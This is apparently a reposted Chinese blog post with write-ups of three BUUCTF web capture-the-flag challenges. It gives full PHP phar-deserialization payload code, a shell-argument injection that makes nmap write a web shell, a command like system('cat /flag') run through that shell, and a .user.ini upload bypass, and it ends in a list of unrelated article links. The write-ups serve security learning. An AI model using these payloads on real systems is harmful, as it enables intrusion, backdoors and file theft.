[CISCN2019 华北赛区 Day1 Web1]Dropbox
打开题目,一个登录界面,SQL?
sqlmap跑一下,没有注入,那么注册一下
登录之后,发现只有一个上传页面,源码里面也没有什么
那就上传看看吧,只能上传图片格式的
上传一个试试
上传之后,发现有下载和删除选项,下载抓包看看。
在下载文件存在任意文件下载漏洞
在index.php里面看到包含了文件class.php,然后在下载其他文件,不过没有flag.php或者flag.txt
那么就代码审计
download.php,简单的对文件名做了一个限定
php
session_start();
if (!isset($_SESSION[' login ' ])) {
header( " Location: login.php " );
die();
}
if (!isset($_POST[' filename ' ])) {
die();
}
include " class.php " ;
ini_set( " open_basedir " , getcwd() . " :/etc:/tmp " );
chdir($_SESSION[ ' sandbox ' ]);
$file = new File();
$filename = (string ) $_POST[' filename ' ];
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, " flag " ) === false ) {
Header( " Content-type: application/octet-stream " );
Header( " Content-Disposition: attachment; filename= " . basename($filename));
echo $file ->close();
} else {
echo " File not exist " ;
}
?>
delete.php,先post一个filename,然后判断文件名长度,并打开文件,最后删除文件
php
session_start();
if (!isset($_SESSION[' login ' ])) {
header( " Location: login.php " );
die();
}
if (!isset($_POST[' filename ' ])) {
die();
}
include " class.php " ;
chdir($_SESSION[ ' sandbox ' ]);
$file = new File();
$filename = (string ) $_POST[' filename ' ];
if (strlen($filename) < 40 && $file->open($filename)) {
$file ->detele();
Header( " Content-type: application/json " );
$response = array(" success " => true , " error " => "" );
echo json_encode($response);
} else {
Header( " Content-type: application/json " );
$response = array(" success " => false , " error " => " File not exist " );
echo json_encode($response);
}
?>
class.php
php
error_reporting( 0 );
$dbaddr = " 127.0.0.1 " ;
$dbuser = " root " ;
$dbpass = " root " ;
$dbname = " dropbox " ;
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);
class User {
public $db;
// 定义一个构造方法初始化数据库
public function __construct() {
global $db; // 调用全局变量
$this ->db = $db; // 初始化,连接数据库使用
}
// 定义一个判断用户是否存在的函数,在数据库里查询
public function user_exist($username) {
// prepare 用于预备一个语句,方便以后引用
$stmt = $this ->db->prepare(" SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1; " );
// bind_param() 该函数绑定了SQL的参数,告诉数据库参数的值,s为string
$stmt->bind_param(" s " , $username);
$stmt ->execute(); // execute()函数 用来执行之前预处理的语句
$stmt->store_result(); // 返回查询的数据
$count = $stmt->num_rows;
if ($count === 0 ) {
return false ;
}
return true ;
}
//
public function add_user($username, $password) {
if ($this ->user_exist($username)) {
return false ;
}
$password = sha1($password . " SiAchGHmFx " );
$stmt = $this ->db->prepare(" INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?); " );
$stmt ->bind_param(" ss " , $username, $password);
$stmt ->execute();
return true ;
}
// 确认用户存在
public function verify_user($username, $password) {
if (!$this ->user_exist($username)) {
return false ;
}
$password = sha1($password . " SiAchGHmFx " ); // 加盐哈希
$stmt = $this ->db->prepare(" SELECT `password` FROM `users` WHERE `username` = ?; " );
$stmt ->bind_param(" s " , $username);
$stmt ->execute();
$stmt ->bind_result($expect);
$stmt ->fetch();
if (isset($expect) && $expect === $password) {
return true ;
}
return false ;
}
// 析构函数,对象生命周期结束的时候调用,必定执行,在结束的时候,会调用close()函数,
// 在File类中可以看到,close函数,会执行file_get_contents(),来获取文件的内容
public function __destruct() {
$ this ->db->close();
}
}
class FileList {
private $files;
private $results;
private $funcs;
public function __construct($path) {
$ this ->files = array();
$ this ->results = array();
$ this ->funcs = array();
$filenames = scandir($path);
$key = array_search(" . " , $filenames); // 在数组中搜索给定的值,成功则返回相应的键名。
unset($filenames[$key]); // 销毁键名
$key = array_search(" .. " , $filenames);
unset($filenames[$key]);
foreach ($filenames as $filename) {
$file = new File();
$file ->open($path . $filename);
array_push($ this ->files, $file); // 将一个或多个单元压入数组的末尾,将file往files数组里面添加
$this ->results[$file->name()] = array(); // 这里得到上传文件名的名字,比如说,flag.txt
}
}
// 定义了一个魔术方法,用来监视一个对象的其他方法,如果调用了该类中没有定义的方法,就会触发该方法执行。
public function __call($func, $args) {
array_push($ this ->funcs, $func); // 如果调用了不存在的方法,将改方法放到funcs数组中
foreach ($this ->files as $file) { // 再从files数组中取出方法,利用这个元素去调用funcs中新增的func
$this ->results[$file->name()][$func] = $file->$func(); // $file->$func相当于close()函数
}
}
public function __destruct() {
$table = ' ' ;
$table . = ' ' ;
// 根据上面call魔术方法,funcs里面是FileList类里没有定义的方法,下面开始遍历
foreach ($this ->funcs as $func) {
$table . = ' ' . htmlentities($func) . ' ' ;
}
$table . = ' Opt ' ;
$table . = ' ' ;
foreach ($this ->results as $filename => $result) {
$table . = ' ' ;
// 这里遍历,我们构造的filename为/flag.txt,所以这里利用close方法,读取flag.txt的值
foreach ($result as $func => $value) {
$table . = ' ' . htmlentities($value) . ' ' ;
}
$table . = ' ' . htmlentities($filename) . ' ">下载 / 删除 ' ;
$table . = ' ' ;
}
echo $table;
}
}
class File {
public $filename;
public function open($filename) {
$ this ->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {
return true ;
} else {
return false ;
}
}
public function name() {
return basename($this ->filename); // 该函数返回路径中,文件的部分,比如../../uploads/test.php ,返回的是test.php
// 利用的时候,flanamew设为/flag.txt,,则调用name函数的时候,返回的是flag.txt
}
public function size() {
$size = filesize($this ->filename);
$units = array(' B ' , ' KB ' , ' MB ' , ' GB ' , ' TB ' );
for ($i = 0 ; $size >= 1024 && $i < 4 ; $i++) $size /= 1024 ;
return round($size, 2 ).$units[$i];
}
public function detele() {
unlink($ this ->filename);
}
// 定义close()函数,用来获取文件的内容
public function close() {
return file_get_contents($this ->filename);
}
}
?>
从上面的三个代码审计可以知道,download.php代码就存在一个任意文件下载漏洞这么个作用,然后在delete.php执行的时候会post一个filename,并且会打开文件,然后删除文件,这里可以利用来读取文件
最后就是class.php,定义了三个类,User,FileList,File。
在User类中,重要关注的是析构函数,他会调用close()函数,而close函数是File类里面定义的一个用来读取文件内容
析构函数会在对象生命周期结束的时候调用,所以最终会调用close()函数,并且读取文件,没有回显,不会输出
那么输出只能在FileList类里面了,可以看到,里面有两个关键的方法,__call魔术方法,方法作用就不说了,上面代码里面说的清楚
__destruct()析构函数里面,有输出,会调用触发__call方法的方法,利用这个来读取文件,并输出。
对于上面的,我们需要使用phar:协议来绕过对flag字符的,读取文件
关于该协议,这里说的不错:https://xz.aliyun.com/t/2715
那么就可以创建User的对象,让db变量是FileList的对象,对象中的文件名定为的位置,猜为flag.txt这样db对象结束时就会调用析构函数,继而执行close函数。但是在db变量中是没有close方法的,所以会触发__call方法,这样就会变成执行了File对象的close方法,触发完__call方法之后,接下来就是析构函数,close方法执行后存在results变量里的结果会加入到table变量中被打印出来,也就是flag会被打印出来
下面是利用phar来构造payload:
php
class User {
public $db;
public function __construct(){
$ this ->db=new FileList;
}
}
class File{
public $filename;
}
class FileList{
private $files;
private $results;
private $funcs;
public function __construct(){
$file =new File;
$file ->filename=' /flag.txt ' ;
$ this ->files = array($file);
$ this ->results = array();
$ this ->funcs = array();
}
}
ini_set( ' phar.readonly ' ,0 );
@unlink( " phar.phar " );
$phar = new Phar("mortals .phar " ); // 后缀名必须为phar
$phar->startBuffering();
$phar ->setStub(" " ); // 设置stub
$mortals = new User();
$phar ->setMetadata($mortals); // 将自定义的meta-data存入manifest
$phar->addFromString("shell .txt " , " test " ); // 添加要压缩的文件
// 签名自动计算
$phar->stopBuffering();
?>
执行之后,会生成一个一个文件mortals.phar
上传phar,然后删除时,delete.php处存在file类的open函数,open函数存在file_exists()方法,这样就可以触发我们phar的反序列化,然后我们phar中调用了User类,User类destruct的时候,调用了db.close方法。抓包,改包,发包,利用phar://协议来读取文件,最终得到flag。
..............end..........
代码审计好难,懵懵懂懂的,看了各位大哥WP。
Online Tool
打开题目地址得到源码,代码审计:
php
if (isset($_SERVER[' HTTP_X_FORWARDED_FOR ' ])) { // 获取IP
$_SERVER[' REMOTE_ADDR ' ] = $_SERVER[' HTTP_X_FORWARDED_FOR ' ];
}
if (!isset($_GET[' host ' ])) {
highlight_file(__FILE__); // 对文件语法进行高亮显示
} else {
$host = $_GET[' host ' ];
$host = escapeshellarg($host); // 把字符串转码成可以在shell命令里使用的参数,将单引号进行转义,转义之后,再在左右加单引号
$host = escapeshellcmd($host); // 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义,将`|*?~<>^()[]{}$\, \x0A 和\xFF以及不配对的单/双引号转义
$sandbox = md5(" glzjin " . $_SERVER[' REMOTE_ADDR ' ]);
echo ' you are in sandbox ' .$sandbox;
@mkdir($sandbox); // 新建目录,默认权限,最大可能的访问权
chdir($sandbox); // 改变目录路径,成功返回true,失败返回false
echo system(" nmap -T5 -sT -Pn --host-timeout 2 -F " .$host);
// -sT,在目标主机的日志上记录大批连接请求和错误的信息
// -Pn,扫描之前不需要用ping命令,有些防火墙禁止使用ping命令
// -T5,时间优化参数,-T0~5,-T0扫描端口的周期大约为5分钟,-T5大约为5秒钟
// --host-time限制扫描时间
// -F,快速扫描
关键点在于这个两个函数,这两个函数结合在一起使用,且先调用escapeshellarg函数的时候,有危险
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
可以知道,escapeshellarg函数会先对host变量中的单引号进行转义,并且转义之后,在 \' 的左右两边再加上单引号,变成 '\''
接下来到escapeshellcmd函数,会对host变量中的特殊字符进行转义(`|*?~<>^()[]{}$\, \x0A//和\xFF以及不配对的单/双引号转义)
那么上面的 \ 就会被再次转义,比如变成 '\\''
在测试的时候得到,如果在字符串首尾加上单引号,经过escapeshellarg函数之后,就可以实现将单引号给闭合了,在经过escapeshellcmd函数的时候单引号就是配对的,就不会进行转义
比如说:
先后经过两个函数的变化:
escapeshellarg:''\'' mortals tx ''\''
escapeshellcmd: ''\\''mortals tx ''\\''
这样就可以实现单引号的逃逸了
在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件,也就是说我们可以使用这个参数
写一个一句话到sandbox里面去,然后执行就行了
在一句话里面,因为又特殊字符,所以经过escapeshellcmd函数的时候会被转义,但执行的时候就没了
来测试一下看看
可以看到,通过-oG参数,得到了一个text1的文件(高版本的可以使用-oN,题目环境为php5版本),里面就有写的一句话,变正常了
也就是说,可以这样构造来一句话后门了
?host=' -oG mortals.php '
根据给的源码知道,执行之后,会生成一个目录,然后这个文件就到了生成的目录中
在生成的目录下执行mortals.php文件,然后蚁剑连接
可以看到,上传成功,并且,可以打开终端了,在根目录下,可以发现flag文件
打开,即可获得flag。
当然,也可以将一句话中的POST改为GET,然后再URL上直接执行系统命令,获取flag
/mortals.php?tx=system('cat /flag');
参考资料:
https://paper.seebug.org/164/#0-tsina-1-56231-397232819ff9a47a7b7e80a40613cfe1
https://althims.com/2019/07/25/buu-online-tool-wp/
https://v0w.top/2018/04/21/SKCTF2-wp/#web-nmap
http://eustiar.tk/archives/521
http://www.lmxspace.com/2018/07/16/%E8%B0%88%E8%B0%88escapeshellarg%E5%8F%82%E6%95%B0%E7%BB%95%E8%BF%87%E5%92%8C%E6%B3%A8%E5%85%A5%E7%9A%84%E9%97%AE%E9%A2%98/#%E4%B8%80-%E5%89%8D%E6%83%85%E6%8F%90%E8%A6%81
[SUCTF 2019]CheckIn
基于各位师傅的WP,复现,学习
上传的题目
题目的考点是利用.user.ini漏洞
通过查看P牛关于.user.ini文件利用:https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html
可以知道PHP_INI配置文件的一些配置,可以通过.user.ini来实现,而.user.ini文件是用户自定义的
可以设置PHP_INI里面除了PHP_INI_SYSTEM模式外的之外的配置文件
而在PHP_INI里面有个配置是.user.ini是有权设置的:auto_prepend_file,通过这个设置可以实现包含文件
在该题里面,禁止了很多,但是对于上传的文件,是通过exif_image来判断上传的文件头,读取一个图像的第一个字节并检查其签名。
可以在上传的文件头加一个图片的文件头就可以了
那么现在就是制作.user.ini文件和一句话,先上传.user.ini文件来实现包含,上传之后还给出了文件所在目录
接着上传test.png
上传成功之后,访问即可获得flag
转载于:https://www.cnblogs.com/mortals-tx/p/11396708.html
你可能感兴趣的:(BUUCTF复现记录2)
【动手学深度学习】#1PyTorch基础操作
-一杯为品-
机器学习 深度学习 人工智能
主要参考学习资料:《动手学深度学习》阿斯顿·张等著【动手学深度学习PyTorch版】哔哩哔哩@跟李牧学AI目录1.1数据操作1.1.1入门1.1.2运算符1.1.3广播机制1.1.4索引和切片1.1.5节省内存1.1.6转换为其他Python对象1.2数据预处理1.2.1读取数据集1.2.2处理缺失值1.2.3转换为张量格式1.3线性代数1.3.1标量1.3.2向量1.3.3矩阵1.3.4张量1.
Netty基础—6.Netty实现RPC服务三
东阳马生架构
Netty应用与源码 Netty RPC服务
大纲1.RPC的相关概念2.RPC服务调用端动态代理实现3.Netty客户端之RPC远程调用过程分析4.RPC网络通信中的编码解码器5.Netty服务端之RPC服务提供端的处理6.RPC服务调用端实现超时功能5.Netty服务端之RPC服务提供端的处理(1)RPC服务提供端NettyServer(2)基于反射调用请求对象的目标方法(1)RPC服务提供端NettyRpcServerpubliccla
数据结构栈和队列
头歌作业
数据结构作业 数据结构 c++ 算法
第四关#include#includeusingnamespacestd;#defineOK1#defineERROR0#defineOVERFLOW-2#defineMAXSIZE5//顺序栈存储空间的初始分配量typedefintStatus;typedefcharSElemType;typedefstruct{inttop[2],bot[2];//栈顶和栈底指针SElemType*V;//栈
moonligh串流教程以及3大问题解决
kalada82
win10电脑常见问题解决方案 职场和发展 小程序
首先说明,ml和steamlink我不是高下评判,大家自己喜欢用那个就行。ml可以关笔记本屏幕用,不用打开steam手动,我喜欢,还能当远程桌面问题;1软件下载,网上找的,随便用就是了2软件使用,开启gefoce的sheld功能·,把软件串流进去3ml使用闪屏,应为串流打开的屏幕是集显,就会这样,就要屏幕独显直连。台式连接一个外接显示器就行,笔记本买个hdmi欺骗器就行4设置hdmi的分辨率,设置
Linux arm64架构修改软件apt\yum源 (统信UOS,麒麟kylin系统修改阿里源、华为源) 国产系统UOS修改apt源
longerxin2020
linux
本文参考链接Linuxarm64架构修改软件源(统信UOS,麒麟系统修改阿里源、华为源)国产系统UOS修改apt源_uos如何快速换源-CSDN博客本文介绍华为arm架构主机使用国内源配置1.备份系统之前的源cp/etc/apt/sources.list/etc/apt/sources.list.bak2.修改源文件/etc/apt/sources.listvim/etc/apt/sources.
Linux将剩余空间分配给根目录
longerxin2020
Linux linux 运维 服务器
要将剩余的100GB空间扩展到根目录(/),你需要执行以下步骤。这些步骤包括调整LVM逻辑卷和文件系统。1.检查当前的磁盘和分区首先,确认当前的磁盘和分区布局。lsblk2.检查LVM物理卷、卷组和逻辑卷使用pvs、vgs和lvs命令来查看当前的LVM配置。pvsvgslvs3.扩展物理卷假设vda3的剩余空间还没有被分配给任何分区,你需要使用pvresize命令来扩展物理卷。sudopvresi
linux下使用curl访问多参数url
耘田
Linux curl linux url 多参数
curl-ihttp://marsoffset.goforandroid.com/GoSmsMarService/abc?a=116.397428&b=39.90923[1]8741[jb-xccheng@usa-ip-12~]$HTTP/1.1500InternalServerErrorServer:nginx/1.2.0Date:Wed,20Jun201204:16:21GMTContent-
S7-1200 博途V18 与 win11-24H2 系统 通信问题 有IP但显示节点不兼容????
Zp_4944
tcp/ip 网络协议 信息与通信 windows 人机交互
博途V18-plc1200在笔记本win11-24H2系统上可访问在线设备时可以搜到plc的ip,但是显示节点不兼容,不能与plc设备建立连接,同时plc显示的ip地址是红色的。换了一个win10的笔记本在线没问题,就把原来win11上的博途V18软件删了,重新安装win10上的博途V18软件,同样的安装发式,设置这些也绝对没有问题,但还是同样连不上plc。关防火墙,以管理员身份运行这些都试过了。
增加对路由参数的支持
智想天开
php代码架构 android php
原文地址:增加对路由参数的支持更多内容请关注:智想天开理解路由参数路由参数允许在URL中捕获动态值,并将这些值传递给控制器的方法。例如:/user/123:捕获用户ID123。/post/45/comment/67:捕获帖子ID45和评论ID67。实现路由参数的关键在于:定义带参数的路由模式:使用特定的语法(如{id})来标识动态部分。解析请求URI:匹配请求URI与路由模式,并提取参数值。传递参
(简单易懂口语化)对象的继承 - 2 成员变量 与 构造方法 的继承
奕口汤圆
Java学习 java 开发语言 考研 学习方法 改行学it 学习
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档成员变量与构造方法的继承规则内容概述一、成员变量的继承1,成员变量继承的本质2,访问的特点3,代码示例二、构造方法的继承1,构造方法的访问特点1.1父类的构造方法不会被子类继承。1.2子类中所有的构造方法默认先访问父类中的无参构造,再执行自己。1.3如何调用父类构造方法?总结内容概述(全文为Java描述)具体讲解成员变量与构造方法的继
前端数据模拟利器 Mock.js 深度解析
2501_91133317
前端 javascript 开发语言
写在前面:宝,我手里有个长期项目,考虑接私活的可以看看我GitHub!https://github.com/ccy-233/coder2retire前端数据模拟利器Mock.js深度解析一、Mock.js核心价值1.1为何需要数据模拟前后端并行开发加速接口文档驱动开发异常场景模拟测试演示环境数据构造1.2Mock.js核心能力//典型数据生成示例Mock.mock('/api/user',{"us
为什么转行大模型行业?深度解析职业变革与技术红利
大模型入门教程
大模型学习 语言模型 人工智能 AI 大模型 程序员 大模型入门
引言2023年ChatGPT的爆发式发展,标志着AI大模型技术正式进入大众视野。这一技术不仅重塑了人工智能的边界,更催生了全新的职业赛道。从传统算法工程师到互联网从业者,越来越多的人开始将目光投向大模型领域。本文将深入探讨这一现象背后的核心动因,并结合行业现状、技术趋势与职业发展路径,为从业者提供系统性分析。一、行业变革:传统岗位萎缩与大模型崛起传统技术岗位的困境以推荐算法为例,随着移动互联网流量
Node.js -- exports 和 module.exports 详解:区别、用法与完整示例
还是鼠鼠
node.js node.js web javascript 前端 vscode
目录Node.jsexports和module.exports详解1.module.exports和exports的关系2.module.exports的正确用法示例1:使用module.exports导出对象运行程序3.exports的正确用法示例2:使用exports导出多个方法4.exports的错误使用方式错误示例5.module.exports导出函数和类示例3:导出单个函数示例4:导出
P1328 [NOIP 2014 提高组] 生活大爆炸版石头剪刀布
让我上个超影吧
算法 算法
题目背景NOIP2014提高组D1T1题目描述石头剪刀布是常见的猜拳游戏:石头胜剪刀,剪刀胜布,布胜石头。如果两个人出拳一样,则不分胜负。在《生活大爆炸》第二季第8集中出现了一种石头剪刀布的升级版游戏。升级版游戏在传统的石头剪刀布游戏的基础上,增加了两个新手势:斯波克:《星际迷航》主角之一。蜥蜴人:《星际迷航》中的反面角色。这五种手势的胜负关系如表一所示,表中列出的是甲对乙的游戏结果。现在,小A和
【go语言】Gin框架介绍和使用
加油,旭杏
Go语言 gin
一、简单使用Gin框架搭建一个服务器packagemainimport("github.com/gin-gonic/gin")funcmain(){//创建一个默认的路由引擎r:=gin.Default()//GET请求方法r.GET("/hello",func(c*gin.Context){//c.JSON返回的是JSON格式的数据c.JSON(200,gin.H{"message":"hell
IPC Kit基础入门:理解HarmonyOS的进程间通信架构
SameX-4869
harmonyos 架构 华为
本文旨在深入探讨华为鸿蒙HarmonyOSNext系统(截止目前API12)的技术细节,基于实际开发实践进行总结。主要作为技术分享与交流载体,难免错漏,欢迎各位同仁提出宝贵意见和问题,以便共同进步。本文为原创内容,任何形式的转载必须注明出处及原作者。在HarmonyOS应用开发中,进程间通信(IPC)是构建复杂应用架构的关键要素。IPCKit为开发者提供了强大的进程间通信能力,使不同进程之间能够高
【数据结构】栈和队列
加油,旭杏
数据结构 java 开发语言
一、栈1.1栈的概念以及结构栈:一种特殊的线性表,其只允许在固定的一端进行插入和删除元素的操作,进行数据插入和删除操作的一端称为栈顶,另一端称为栈底。栈中的数据元素遵守后进先出的原则。压栈:栈的插入操作叫做进栈/压栈/入栈,入数据在栈顶出栈:栈的删除操作叫做出栈,出数据在栈顶1.2栈的实现栈的实现一般可以使用数组或者链表实现,相对而言数组的结构实现更加优一些,因为数组在尾上插入数据的代价比较小。二
Java Stream 去重的多种方法
坎布里奇
java java python 开发语言
在JavaStream中实现去重有多种方法,具体取决于需求和场景。以下是常见的几种方法及示例:1.使用distinct()方法适用于对象已正确实现equals()和hashCode(),基于对象整体去重并保留顺序:ListuniquePersons=persons.stream().distinct().collect(Collectors.toList());2.根据对象的属性去重方法一:使用C
算法学习之路——贪心算法
蒋楠鑫
算法 算法 贪心算法
文章目录一、前言二、什么是算法三、什么是贪心算法1.含义2.基本思路3.适用场景四、代码实现五、经典例题分析六、总结一、前言先来看一道简单的数学问题:小明有30元钱,每瓶酒要5元钱,每3个空瓶子可以换1瓶酒,请问小明最多可以喝到多少瓶酒?这道题目显然是一道求最优解的问题,由于数据量小我们可以用最简单最直接的枚举法来解决,但是如果将题目泛化一下呢:小明现在购买了m瓶酒,每n个空瓶子可以换1瓶酒,请问
python网格插值站点_在python中,在二维零网格上两点之间插值一条值线
weixin_39965490
python网格插值站点
TLDR:在2dnumpy数组中找到2个点后,如何在0数组中在它们之间插值一条1行?在上下文:目前我正在尝试从二值化的医学图像数据(0和1)对一个3d数组执行2d操作。最终目标是在填充体素/像素(即第一个和最后一个实例)的起点和终点之间添加一条1s的线。在为此,我使用SimpleITK分割一行,然后将其转换为numpy数组。在其他示例之后,我编写了返回一组数组的函数,这些数组显示填充(1)个像素和
springboot是如何在没有web.xml的情况下在外部tomcat启动的
菜鸟王老汉
spring
最近在公司部署测试环境的时候遇到了问题,本地用springboot内嵌tomcat启动没有问题,部署到测试环境的外部tomcat就不加载,在咨询了同事之后在启动类上继承了SpringBootServletInitializer之后就没有了问题,但并没有深入去想。由于servlet的规范是要配置web.xml的,包括Struts2和spring都是要在web.xml配置的,有一天在服务器上看编译后的
地理数据中的分辨率转换
木叶清风666
地理信息数据处理 matlab python 开发语言
数据分辨率问题气象海洋数据在实际应用中,常常涉及到重采样,即分辨率的提高或降低等操作。本文提供了matlab以及python的样例程序,以降低(网格平均)或提高(线性插值)数据的分辨率。1.高分辨率——>低分辨率可以使用循环逐个网格进行操作,但循环次数过多,存在效率低下的问题。%---需要的分辨率0.25°,以及经纬度网格点deg=0.25;lat_era=16:deg:47.75;lon_era
学习SpringBoot过程中常见问题汇总及多工程项目使用 IntelliJ IDEA 打开
KunQian_smile
springBoot
一:SpringBoot:redisClientine.test.serviceImpl.RedisServiceImplrequiredabeanoftype‘com.examp1:没有自动注入导致。service类上面没有@service注解或者mapper上没有@Repository注解,但是这种情况比较少见,一般不会忘记。2:配置了mybatis,但没有指定扫描的包。(1)直接在生成出来的
Spring Data JDBC 详解
m0_74823933
面试 学习路线 阿里巴巴 spring java 数据库
目录一、JPA背景?二、SpringBoot整合SpringdataJDBC??1.配置数据源?2.配置Druid的admin后台??3.Spring-data-jdbc常用接口查询策略1)?CrudRepository增删改查2)PagingAndSortingRepository分页排序一、JPA背景早期的JPA的特性是懒加载和关联查询,一下能查出所有的关联信息,但我们开发者在查询SQL的时候
SpringBoot中Server层以及Mapper层常用注解
π大星的日常
java java-rabbitmq
最近看了一下SpringBoot2的课程,发现好多的注解并不是很了解,只是简单的会用,但是真是发生的作用却不知道,最近花了一些时间把这些注解进行了一下整理,针对不同的层级进行了细致的划分,最近几天会依次给大家更新关于注解的内容,对大家有帮助的话点赞支持一下哦!4.Service层注解@Service注解一般写在业务层的接口实现类上,而不是接口上。4.1@Service@Service:@Servi
【C++游戏开发】零基础手写完整飞机大战游戏(基于EasyX图形库/详细注释/源码分享)
小乌龟登顶记
stm32 单片机 嵌入式硬件
一、开发环境与资源准备1.1环境要求VisualStudio2019+(推荐2022)EasyX图形库(官网下载适配VS版本)WindowsSDK(安装VS时勾选)1.2资源文件在项目目录创建res文件夹,存放以下素材(素材自备):plane.png玩家飞机(50x50)enemy.png敌机(50x50)bullet.png子弹(10x20)bg.jpg滚动背景(600x700)boom.wav
[QMT量化交易小白入门]-二十二、deepseek+cline+vscode,让小白使用miniQMT量化交易成为可能
python自动化工具
QMT量化交易小白入门 vscode ide 编辑器
本专栏主要是介绍QMT的基础用法,常见函数,写策略的方法,也会分享一些量化交易的思路,大概会写100篇左右。QMT的相关资料较少,在使用过程中不断的摸索,遇到了一些问题,记录下来和大家一起沟通,共同进步,自己淋过雨了,希望大家都有一把伞。文章目录相关阅读DeepSeek新用户注册cline集成指令测试相关阅读小白也能做量化:零门槛QMT、Ptrade免费送量化交易入门:如何在QMT中配置Pytho
ubuntu 24.10安装mysql
linuxxx110
ubuntu mysql
1.更新软件包列表在安装MySQL之前,先更新系统的软件包列表sudoaptupdate2、安装MySQL服务器sudoaptinstallmysql-server3.启动MySQL服务sudosystemctlstatusmysql4、运行安全脚本MySQL提供了一个安全脚本,用于设置root密码、移除匿名用户、禁止远程root登录等。运行以下命令sudomysql_secure_install
HarmonyOS Next 状态管理:Type 装饰器实践
月未央
harmonyos 华为
目录HarmonyOSNext状态管理:Local装饰器实践HarmonyOSNext状态管理:Param装饰器实践HarmonyOSNext状态管理:Once装饰器实践HarmonyOSNext状态管理:Event装饰器实践HarmonyOSNext状态管理:!!状态装饰器实践HarmonyOSNext状态管理:@ObserverV2和@Trace装饰器实践HarmonyOSNext状态管理:P
JavaScript 全面教程:从基础到高级实践
幼儿园扛把子\
javascript 开发语言 ecmascript
JavaScript全面教程:从基础到高级实践目录JavaScript全面教程:从基础到高级实践2.JavaScript基础语法2.1变量与数据类型2.1.1变量声明2.1.2数据类型2.2条件语句与循环2.2.1条件语句2.2.2循环2.3函数2.3.1函数定义2.3.2参数默认值3.对象与数组3.1对象3.2数组4.高级特性与最佳实践4.1作用域与闭包4.1.1闭包示例4.2事件循环(Even
JAVA基础
灵静志远
位运算 加载 Date 字符串池 覆盖
一、类的初始化顺序
1 (静态变量,静态代码块)-->(变量,初始化块)--> 构造器
同一括号里的,根据它们在程序中的顺序来决定。上面所述是同一类中。如果是继承的情况,那就在父类到子类交替初始化。
二、String
1 String a = "abc";
JAVA虚拟机首先在字符串池中查找是否已经存在了值为"abc"的对象,根
keepalived实现redis主从高可用
bylijinnan
redis
方案说明
两台机器(称为A和B),以统一的VIP对外提供服务
1.正常情况下,A和B都启动,B会把A的数据同步过来(B is slave of A)
2.当A挂了后,VIP漂移到B;B的keepalived 通知redis 执行:slaveof no one,由B提供服务
3.当A起来后,VIP不切换,仍在B上面;而A的keepalived 通知redis 执行slaveof B,开始
java文件操作大全
0624chenhong
java
最近在博客园看到一篇比较全面的文件操作文章,转过来留着。
http://www.cnblogs.com/zhuocheng/archive/2011/12/12/2285290.html
转自http://blog.sina.com.cn/s/blog_4a9f789a0100ik3p.html
一.获得控制台用户输入的信息
&nbs
android学习任务
不懂事的小屁孩
工作
任务
完成情况 搞清楚带箭头的pupupwindows和不带的使用 已完成 熟练使用pupupwindows和alertdialog,并搞清楚两者的区别 已完成 熟练使用android的线程handler,并敲示例代码 进行中 了解游戏2048的流程,并完成其代码工作 进行中-差几个actionbar 研究一下android的动画效果,写一个实例 已完成 复习fragem
zoom.js
换个号韩国红果果
oom
它的基于bootstrap 的
https://raw.github.com/twbs/bootstrap/master/js/transition.js transition.js模块引用顺序
<link rel="stylesheet" href="style/zoom.css">
<script src=&q
详解Oracle云操作系统Solaris 11.2
蓝儿唯美
Solaris
当Oracle发布Solaris 11时,它将自己的操作系统称为第一个面向云的操作系统。Oracle在发布Solaris 11.2时继续它以云为中心的基调。但是,这些说法没有告诉我们为什么Solaris是配得上云的。幸好,我们不需要等太久。Solaris11.2有4个重要的技术可以在一个有效的云实现中发挥重要作用:OpenStack、内核域、统一存档(UA)和弹性虚拟交换(EVS)。
spring学习——springmvc(一)
a-john
springMVC
Spring MVC基于模型-视图-控制器(Model-View-Controller,MVC)实现,能够帮助我们构建像Spring框架那样灵活和松耦合的Web应用程序。
1,跟踪Spring MVC的请求
请求的第一站是Spring的DispatcherServlet。与大多数基于Java的Web框架一样,Spring MVC所有的请求都会通过一个前端控制器Servlet。前
hdu4342 History repeat itself-------多校联合五
aijuans
数论
水题就不多说什么了。
#include<iostream>#include<cstdlib>#include<stdio.h>#define ll __int64using namespace std;int main(){ int t; ll n; scanf("%d",&t); while(t--)
EJB和javabean的区别
asia007
bean ejb
EJB不是一般的JavaBean,EJB是企业级JavaBean,EJB一共分为3种,实体Bean,消息Bean,会话Bean,书写EJB是需要遵循一定的规范的,具体规范你可以参考相关的资料.另外,要运行EJB,你需要相应的EJB容器,比如Weblogic,Jboss等,而JavaBean不需要,只需要安装Tomcat就可以了
1.EJB用于服务端应用开发, 而JavaBeans
Struts的action和Result总结
百合不是茶
struts Action配置 Result配置
一:Action的配置详解:
下面是一个Struts中一个空的Struts.xml的配置文件
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE struts PUBLIC
&quo
如何带好自已的团队
bijian1013
项目管理 团队管理 团队
在网上看到博客"
怎么才能让团队成员好好干活"的评论,觉得写的比较好。 原文如下: 我做团队管理有几年了吧,我和你分享一下我认为带好团队的几点:
1.诚信
对团队内成员,无论是技术研究、交流、问题探讨,要尽可能的保持一种诚信的态度,用心去做好,你的团队会感觉得到。 2.努力提
Java代码混淆工具
sunjing
ProGuard
Open Source Obfuscators
ProGuard
http://java-source.net/open-source/obfuscators/proguardProGuard is a free Java class file shrinker and obfuscator. It can detect and remove unused classes, fields, m
【Redis三】基于Redis sentinel的自动failover主从复制
bit1129
redis
在第二篇中使用2.8.17搭建了主从复制,但是它存在Master单点问题,为了解决这个问题,Redis从2.6开始引入sentinel,用于监控和管理Redis的主从复制环境,进行自动failover,即Master挂了后,sentinel自动从从服务器选出一个Master使主从复制集群仍然可以工作,如果Master醒来再次加入集群,只能以从服务器的形式工作。
什么是Sentine
使用代理实现Hibernate Dao层自动事务
白糖_
DAO spring AOP 框架 Hibernate
